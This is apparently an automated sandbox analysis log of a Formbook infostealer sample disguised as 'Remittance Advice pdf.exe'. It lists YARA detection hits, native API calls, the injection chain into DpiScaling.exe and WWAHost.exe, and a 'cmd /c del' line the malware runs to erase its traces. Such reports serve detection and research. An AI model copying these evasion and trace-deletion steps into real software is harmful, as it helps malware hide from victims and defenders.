          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979560 NtWriteFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0497A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04979B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427B90 NtCreateFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427C40 NtReadFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427CC0 NtClose,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427D70 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427C3A NtReadFile,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427CC4 NtClose,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10427D6A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717B90 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717C40 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717CC0 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717D70 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717C3A NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717CC4 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02717D6A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494841F
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FD466
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04962581
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494D5E0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A025DD
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A02D07
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04930D20
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A01D55
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A02EF7
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FD616
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04956E30
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A01FF1
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0DFCE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0494B090
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A020A8
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049620A0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A028EC
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A0E824
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F1002
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0493F900
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04954120
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A022AE
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049EFA2B
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_0496EBB0
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049F03DA
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_049FDBD2
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_04A02B28
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10411026
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10411030
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1042B127
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10418A30
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1042B52A
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10412D90
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1042C59F
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_1042BF81
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 13_2_10412FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03742B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373DBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036AEBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037422AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03694120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03731002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037428EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A20A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037420A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03741FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03696E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373D616
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03742EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03741D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03670D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03742D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037425DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A2581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373D466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02708A30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0271B127
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02702FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0271BF81
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0271B52A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_02702D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0271C59F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0367B150 appears 35 times
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 0493B150 appears 45 times
          Source: Remittance Advice pdf.exeBinary or memory string: OriginalFilename vs Remittance Advice pdf.exe
          Source: Remittance Advice pdf.exe, 00000000.00000003.329625690.0000000002124000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs Remittance Advice pdf.exe
          Source: Remittance Advice pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@8/4
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Remittance Advice pdf.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeFile read: C:\Users\user\Desktop\Remittance Advice pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Remittance Advice pdf.exe 'C:\Users\user\Desktop\Remittance Advice pdf.exe'
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\DpiScaling.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\DpiScaling.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: Binary string: WWAHost.pdb source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500837817.0000000004A2F000.00000040.00000001.sdmp, WWAHost.exe, 00000014.00000002.599807554.000000000376F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe, WWAHost.exe
          Source: Binary string: DpiScaling.pdb source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: DpiScaling.pdbGCTL source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E9C388 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E8D320 push 0040E090h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E941C0 push 00414DE0h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E94108 push 00414D49h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E990D4 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E8D050 push 0040E090h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EAF7E8 push 00430408h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E93790 push 0041442Ch; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA8728 push 00429348h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EB0700 push 00431320h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E93718 push 00414382h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E93716 push 00414382h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E866E0 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E826C0 push eax; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA86C0 push 004292F2h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA76D8 push 004282F8h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA96D4 push 0042A300h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA7698 push 004282B8h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EB066C push 00431298h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E88674 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EB05D0 push 0043121Dh; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EAA528 push 0042B16Bh; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E8D4A0 push 0040E103h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E88484 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E8D49E push 0040E103h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E85BF8 push 00406818h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA9BA4 push 0042A7C4h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03EA6B3C push 0042775Ch; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E85B08 push 00406728h; ret
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeCode function: 0_3_03E95B18 push ecx; mov dword ptr [esp], edx
